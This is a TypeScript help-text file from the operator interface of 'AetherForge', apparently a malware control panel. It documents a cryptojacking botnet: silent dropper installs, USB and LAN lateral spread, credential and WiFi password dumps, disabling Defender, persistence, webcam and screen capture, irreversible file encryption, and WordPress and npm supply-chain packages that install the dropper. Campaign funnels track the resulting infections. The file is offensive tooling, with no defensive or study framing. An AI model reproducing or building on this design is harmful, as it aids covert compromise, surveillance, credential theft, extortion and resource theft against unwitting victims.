Files
AetherForge/server/web/src/help/uiHelp.ts
AetherForge 2cad49d82c
Some checks failed
CI Docker Mining Proof / Linux agent hashrate proof (push) Has been cancelled
Deploy Recon UI: consume new recon APIs with streaming results and action matrix
2026-06-07 12:24:10 -07:00

275 lines
21 KiB
TypeScript
Raw Blame History

This file contains ambiguous Unicode characters
This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
/** Inline help for dashboard, crucible, fleet, build manager, and other operator UI — not forge/calibrate form fields. */
export const UI_HELP: Record<string, string> = {
dash_fleet_health:
'Composite score from online ratio, accept rate, and hashrate activity. Green means the fleet is mining normally; amber or red flags nodes to check on Crucible.',
dash_install_funnel:
'Shows how many agents connected in the last 7 days, grouped by forged build. USB column counts agents that arrived via USB spread.',
dash_operator_audit:
'Server-side log of operator actions (logins, forge, remote commands). Last 50 entries; refreshes every minute.',
dash_signal_locked:
'Live WebSocket link to the control server. When reconnecting, fleet stats may be stale until the signal locks again.',
dash_advanced_mode:
'Overview hides extra charts, topology, pool status, and the raw matrix stream. Advanced shows the full telemetry deck.',
dash_raw_stream:
'Full-screen scrolling dump of live WebSocket traffic — useful for debugging agent messages, not day-to-day monitoring.',
dash_fleet_hash:
'Sum of 15-minute average hashrate across all online Monero (RandomX) miners in the fleet.',
dash_est_daily:
'Rough USD/day from live fleet hashrate and the cached XMR price. Connect a wallet on Calibrate for pool-reported earnings instead.',
dash_accept_rate:
'Percentage of submitted shares accepted by the pool. Below ~95% often means bad pool connectivity or misconfigured workers.',
dash_nodes_live:
'Online agents with an active WebSocket heartbeat versus total registered agents (including offline).',
dash_fleet_pipeline:
'Setup checklist: forged build exists → agent deployed → node online → hashrate flowing → shares reaching the pool.',
dash_pool_stratum:
'Upstream pool connections from this control server. LIVE = stratum connected; DEGRADED or DOWN means payout risk.',
dash_ai_activity:
'Agents with AI Autonomy enabled ask Ollama on this PC for self-healing decisions. Empty until a forged miner reports in.',
dash_gpu_rvn:
'Ravencoin KawPoW GPU miners detected on online agents. Separate from Monero CPU hashrate above.',
dash_xmr_section:
'Monero RandomX CPU mining stats for the fleet. GPU Ravencoin rigs appear in the RVN section below when active.',
crucible_node_roster:
'Every registered agent. Click to select; badges show SSH reachability, security posture, patches, and resource pressure.',
crucible_heat_map:
'Spatial view of node selection and group colors. Click a dot to toggle that agent in the roster.',
crucible_groups:
'Named color groups for the fleet. Click a group chip to select all members for bulk commands.',
crucible_active_target:
'The focused node when exactly one is selected — used for single-agent panels like live desktop and file browser.',
crucible_access_depth:
'Host posture, LOTL mining tier status, join lane, and effective onion order for the selected agent — from live WS stats plus mining_diagnostics when run.',
crucible_access_depth_calibrate:
'Calibrate → lotl_onion_tiers changes spread contingency order on next agent reconnect (agents forged with lotl_policy_from_server).',
crucible_tab_ops:
'Day-to-day remote control: pause/resume mining, shell commands, agent restart, logs, and power actions.',
crucible_tab_recon:
'Intelligence gathering: posture scans, full system audit, screenshots, camera list, and network discovery.',
crucible_tab_files:
'Browse, upload, download, and encrypt files on the selected online agent via the remote file browser.',
crucible_tab_spread:
'Lateral movement and propagation: spread-now, SMB shares, credential vault, and secure wipe.',
crucible_tab_tunnels:
'SSH port forwards and protocol tunnels between your control PC and selected agents.',
crucible_mining_ops:
'Fleet health power management: pause or resume hashing on selected online nodes. Mining telemetry egresses on the agent WebSocket (same port as heartbeat) — the agent process stays connected.',
crucible_resume:
'Fleet health job: restore hashing workload after a pause or idle throttle.',
crucible_pause:
'Fleet health job: power down hashing on selected nodes without stopping the agent — they stay connected on WSS.',
crucible_full_audit:
'Deep posture scan (3060s): firewall, WAN IP, geo, DNS, ARP, subnet scan, hardware, and listeners.',
crucible_posture_badge:
'Quick security summary from the last heartbeat: AV, firewall, SSH, elevation, and patch state.',
crucible_vpc_seeder:
'AWS EC2 agents report vpc-id from IMDS. Fleet Torrent elects one VPC seeder per vpc-id; badge shows VPC seeder (primary) or VPC leecher (secondary seeder in same VPC).',
crucible_master_terminal:
'Command output and errors from bulk ops stream here. Green lines succeeded; red lines failed.',
crucible_section_agent:
'Restart, fetch logs, kill, or fully uninstall the agent process on selected nodes.',
crucible_section_system:
'OS-level power actions — reboot or shutdown the whole machine, not just the miner.',
crucible_section_persistence:
'BITS jobs, host-binary hijack, and read-only persistence audits for surviving reboots.',
crucible_section_maintenance:
'Fleet upgrades, wake-on-LAN, registry read/write, and remote process kill by PID.',
crucible_section_intel:
'One-click intel pulls: screenshot, processes, netstat, clipboard, WiFi creds, and more.',
crucible_section_security:
'Post-exploit posture changes — disable Defender or dump saved WiFi passwords.',
crucible_section_network:
'Connectivity probes, listener tables, patch status, ARP neighbors, and firewall controls.',
crucible_section_media:
'Live desktop polling, camera enumeration, and per-device webcam snapshots.',
crucible_section_files_quick:
'Push files to Desktop or a custom path, or pull a remote file into the terminal.',
crucible_section_files_advanced:
'Delete, move, or secure-wipe paths on selected agents — confirm before destructive ops.',
crucible_section_destructive:
'SYS CRYPT encrypts Documents/home — irreversible without the key.',
crucible_section_spread:
'On-demand lateral spread, subnet discovery, SMB shares, credential vault names, and Probe & Join (discover_and_join).',
crucible_section_cred_graph:
'Read-only credential affinity edges per /24 subnet — success/fail counts from authorized spread runs (no secrets).',
crucible_section_service_graph:
'Enumerated services and join-lane candidates for the selected agent subnet (from discover_and_join / service probe).',
crucible_section_seek:
'SUPP Seek recursively seeds media folders with silent launcher stubs (Windows + Mac/Linux).',
crucible_section_ssh:
'Probe or wake OpenSSH on Windows nodes, plus a quick reference for direct and tunneled SSH.',
crucible_section_tunnels:
'WAN IP, UPnP hole punch, Cloudflare outbound tunnels, mesh peers, and tunnel stop.',
crucible_section_protocol_tunnel:
'Full protocol tunnel panel for the focused node — cloudflared, SSH forwards, and live status.',
crucible_section_portfwd:
'Matrix of SSH local-forward rules pushed to selected Windows agents.',
crucible_section_spread_templates:
'Generate and download custom script templates for lateral movement, registry auto-run persistence, or custom payloads with baked-in server configuration.',
bm_pin_dropper:
'Pinned build is served by unauthenticated dropper URLs (install.ps1 / install.sh). Only one build can be pinned at a time.',
bm_public_build:
'Public builds appear on the login page download list without signing in — useful for LAN handoffs.',
bm_dropper_oneliner:
'One-liner scripts download and silently install the pinned build (or latest if none pinned) from this server.',
bm_reforge:
'Open Forge with this build\'s settings pre-filled so you can tweak and compile a new revision.',
bm_platform_badge:
'Target OS baked into the installer: Windows, Linux, macOS, or Universal (multi-OS ZIP).',
fm_remote_browse:
'Live directory listing on the selected agent. Double-click folders to navigate; select files to download or preview text.',
fm_upload:
'Push a file from your browser to the agent. Set destination path or defaults to current folder + filename.',
fm_encrypt_path:
'AES-256-GCM encrypt every file at the current path. Irreversible without the key — requires Remote Aggressive Ops.',
pt_path_tracer:
'On-demand multi-hop WireGuard VPN through up to 3 Windows agents. Scan the QR or import the .conf on your phone.',
pt_agent_chain:
'Pick agents in order — traffic hops through each node. Windows only; max 3 hops. Click TRACE to orchestrate tunnels.',
pt_onion_timeline:
'Fork-merge onion timeline for Path Tracer chains — ghost branches per hop, merge winning strains, and skip hospice-retired spread lanes when picking merge parents.',
fleet_runtime_policy:
'Push live mining policy (schedule, CPU cap, optional pool override) to online agents without re-forging.',
fleet_runtime_modules:
'Hot-load optional agent modules (e.g. crucible ops pack) onto connected workers.',
spread_funnel_widget:
'Campaign install funnel: page hits → downloads → first beacon → mining, per ?c= slug. See Emberwake for full war room.',
md_overview:
'Fast path to a forged agent: pick Ghost, Loud, or Spread, optionally layer a spread profile, then one click builds and exports a kit when needed. Copy install commands from Builds; track campaigns in Emberwake; use Forge when you need every option.',
md_operation_chip:
'Ghost = stealth worker for quiet LAN installs. Loud = visible logs for lab testing. Spread = universal kit with USB/LAN autospread — pair with a spread profile on the right.',
md_spread_profile:
'Optional deliverable shape on top of your operation chip — e.g. LAN Kindling adds SMB/SSH spread flags, Desktop Fusion enables media fusion packaging.',
md_campaign_identity:
'Campaign slug tags every link with ?c= so Emberwake can group hits and beacons. Worker name, control URL, and wallet are the only identity fields you need here.',
md_strike_pipeline:
'One automated run: lock presets → compile the agent → export spread-kit ZIP when the loadout requires it. Install commands live on Builds after the run finishes.',
md_equip_strike:
'Starts the pipeline using your equipped loadout. Fix wallet or control URL errors before clicking; grab install one-liners from Builds when done.',
md_loadout_preview:
'Live summary of your equipped preset: operation chip, spread profile, campaign slug, worker name, and deliverable shape. Preflight runs before Equip & Strike — fix wallet or endpoint errors shown below the button.',
md_campaign_slug:
'Short tag appended as ?c= on install links. Emberwake War Room groups hits, downloads, beacons, and hashrate by this slug — set it before forging so telemetry lands in the right campaign.',
md_preflight:
'Wallet, control URL, and worker name must pass validation before Equip & Strike unlocks. Spread Kit export is skipped automatically when your loadout ships a single-platform or fusion deliverable instead.',
subnet_immune_autopsy:
'Auto-built when a /24 hits five spread failures: last LOTL attempts, WSUS mimic, persona, erasure fallback, atlas gossip whispers, cause-of-death, and BGP vaccination lane from the spread router.',
pt_subnet_autopsy:
'Immune autopsy for spread-target /24 prefixes paused by subnet_spread_pause — shows vaccination route hints beside Path Tracer spread routes.',
ew_overview:
'Spread desk after you forge: tag install links with ?c=, export lure kits, and read campaign funnels. Forge agents on Mission Deck (fast) or Forge (full control).',
ew_campaign_setup:
'Shared settings for every Emberwake export on this page. Campaign slug tags telemetry; pinned build selects which forged agent gets installed.',
ew_campaign_slug:
'Short name appended as ?c= on dropper and download URLs. War Room groups hits, downloads, beacons, and hashrate by this slug.',
ew_install_links:
'Per-platform install one-liners live in Builds. Pin a build there, then copy PowerShell / bash / download URLs for remote deploy.',
ew_spread_kit:
'Downloads a ZIP of spread-kit templates (README, Deploy scripts, lander assets) with your server URL and campaign slug baked in.',
ew_war_room:
'Live funnel per campaign: page hits → downloads → first agent beacon → mining nodes and fleet hashrate. Updates every 15s and on WebSocket push.',
ew_supply_chain:
'Advanced: export a WordPress plugin ZIP or npm package template that pulls your dropper on install. Uses campaign settings above.',
ew_public_urls:
'Direct /api/v1/public/download links for each build — same files shown on the login page when a build is marked public.',
ew_techniques:
'Index of spread vectors with links into the tabbed Spread Techniques playbook. Emberwake handles actions; the playbook has step-by-step how-to.',
ew_shared_notes:
'Collaborative scratchpad synced to every logged-in operator. Use for lure copy, host paths, or rotation notes — not stored on agents.',
ew_war_room_funnel:
'Shows hits → downloads → first beacon → mining counts per ?c= slug for the selected window. Each column is a funnel stage; a large drop at any step points to where the install chain is breaking.',
ew_war_room_views:
'Switch between Funnel board (per-stage campaign breakdown), Stats table (full numbers with sparklines), and Constellations (visual map of campaign activity). All three draw from the same rolling window.',
ew_war_room_funnel_board:
'Per-campaign funnel cards: hits → downloads → first beacon → mining → hashrate with stage conversion rates and 7-day hit sparklines. Compare to Command Deck Install Funnel (build-centric) — War Room is campaign-slug centric via ?c=.',
ew_war_room_stats_table:
'Tabular War Room view with odometer counts, conversion %, online agents, and daily hit sparklines per campaign slug. Same data as the funnel board — use when you need sortable numbers across many campaigns.',
ew_war_room_constellations:
'Force-directed map: node size = hits, brightness = online agents, color = conversion %, edges = shared pin/build. Click a star to highlight its funnel card below.',
ew_war_room_leak:
'Automated funnel leak hints when a stage drops sharply (e.g. downloads but no beacons). LEAK = critical drop; Drip = minor — follow the suggested action on each card.',
ew_cloud_aws:
'AWS spread kits: S3+CloudFront erasure shards, SSM documents, Launch Templates, Fargate burst, EventBridge fan-out, and Cloud Map snippets. Connection test is HTTP reachability only — operator applies templates in their AWS account.',
ew_cloud_generic:
'Vendor-neutral cloud kits: MinIO S3-compatible staging and curl-manifest shard lists. Point bucket/endpoint fields at your operator-owned origin.',
ew_crucible_recon_link:
'Cross-link to Crucible with ?reconHost= — opens the spread tab, loads GET /api/v1/recon/deploy-kit, and shows spread-to-unreachable-host when no fleet agent matches the IP.',
crucible_recon_host:
'Query param ?reconHost= pre-filters the roster to matching IP/hostname and opens Spread ops. When the host has no online agent, use manual IP target + Spread to host (POST /api/v1/fleet/spread-to-host).',
crucible_btn_spread_now:
'Triggers the lateral movement sweep immediately on selected nodes — tries discovered LAN IPs from ARP, SMB, and subnet scan results. Requires Remote Aggressive Ops capability; a prior subnet scan or ARP run gives it more targets.',
crucible_btn_subnet_scan:
'Probes the local /24 for live hosts via ICMP and TCP knock and returns a host list. Feeds Spread Now and SSH probe. Can take 1040 s on congested or slow subnets.',
crucible_btn_hole_punch:
'Asks the LAN router to create a UPnP inbound port mapping (default 8989) so the agent is reachable from WAN without a VPN or port-forward rule. Requires a router with UPnP enabled.',
crucible_btn_cf_tunnel:
'Launches a cloudflared outbound tunnel to the optional target URL (or the server default tunnel URL). Agent dials out — no inbound firewall rule or open port needed on the target machine.',
fl_filter_chips:
'Narrow the roster by name/IP/notes/tags (text search), tag label, subnet prefix, minimum 15m hashrate, or the "needs attention" flag (offline or idle miners below 100 H/s).',
fl_bulk_actions:
'Actions applied to every checked agent at once: pause or resume mining, stop the miner thread, restart only idle workers, take a screenshot (one agent only), or permanently delete from roster.',
fl_groups:
'Named color-coded subsets of the fleet stored in browser local storage. Click a chip to check-select all members — then apply bulk actions or send Crucible commands to the whole group at once.',
set_alerts:
'Dashboard thresholds that trigger amber or red status badges: how long before an agent is marked offline, how far hashrate must drop to flag a node, and at what rejection-rate share quality degrades.',
set_alert_notifications:
'Push fleet events to Telegram, a custom webhook endpoint, or email (SMTP). Fill bot token + chat ID or webhook URL, choose which events to forward, save Calibration, then send a test message to confirm delivery.',
set_webhook:
'HTTP POST endpoint that receives JSON for every enabled fleet event: { event, title, message }. Use for Slack incoming webhooks, n8n automation, custom dashboards, or any HTTP trigger.',
ui_color_scheme:
'AetherForge is steampunk dark-first. When your OS uses light mode, panels soften slightly via prefers-color-scheme — neon brass/cyan tokens stay the same. No separate theme toggle yet.',
dr_overview:
'Owned-target browser deploy recon from the control server: TCP port matrix, shallow web crawl for upload/SSRF/CMS hints, and copy-paste curl install.sh + SSRF probe URLs pinned to your session build.',
dr_port_matrix:
'Green cells are open TCP ports on the target from this server. Click an open port for the spread lane hint (WinRM, SMB, curl drop, SSH LOTL).',
dr_path_prefix:
'Optional URL path prefix for the web crawl seed (e.g. /admin). Port field sets the HTTP(S) service port; HTTPS toggle sets scheme.',
dr_fleet_discoveries:
'Merged view of agent subnet recon (WS subnet_discovery_update) and your manual POST /api/v1/recon/scan results. Shows uninfected LAN hosts with open fleet ports — not yet registered as agents.',
dr_fleet_subnet_filter:
'Narrow discoveries to one /24 prefix (e.g. 10.0.1.x). Agent reporters tag subnet_prefix from their local interface.',
dr_fleet_port_filter:
'Show only hosts with a given TCP port open — e.g. 22 for SSH LOTL, 5985 for WinRM spread candidates.',
dr_fleet_sort:
'Order the table by last_seen (newest first by default) or IP. Live WS updates bump last_seen without reordering until you refresh sort.',
dr_scan_profile:
'Quick runs the default fleet port matrix and a shallow crawl. Deep adds banners, admin paths, and more pages. SSRF only skips port dial and arms the canary for reflective URL fields.',
dr_port_bundle:
'Optional port profile sent as profiles[] on POST /api/v1/recon/scan (web, windows, linux, cloud_metadata). Fleet default uses the server quick matrix.',
dr_form_fingerprint:
'High-scoring form fields from the crawl with suggested paste targets (SSRF canary URL or /get probe).',
dr_ssrf_canary:
'HTTPS callback URL on your control server (/recon/ping/{scan_id}). Poll status and listen for recon_canary_hit over the operator WebSocket.',
dr_upload_admin_map:
'Merged upload-hunter hits and probed admin/login paths with HTTP status and signal tags.',
dr_tech_stack:
'Stack hints from port banners and HTML crawl (framework, CMS, server headers).',
dr_deploy_kit:
'Suggested join lane for GET /api/v1/recon/deploy-kit on this host after scan (open ports + crawl signals).',
dr_banner_grab:
'Service banners and HTTP titles from open web ports during deep scans.',
dr_relay_scan:
'POST /api/v1/recon/relay-scan from a fleet seed on the target /24 when the control server cannot reach the host directly.',
dr_action_matrix:
'Ranked spread lanes from recommendations and open ports with quick links to playbook and Crucible spread tab.',
dr_playbook_wizard:
'Modal tree of recommended lanes for the current target with Crucible deep links.',
dr_history:
'Server and local scan history for the target host; click a row to reload that report in the UI.',
dr_export_json:
'Download the raw ReconScanReport JSON for ticketing or offline diff.',
};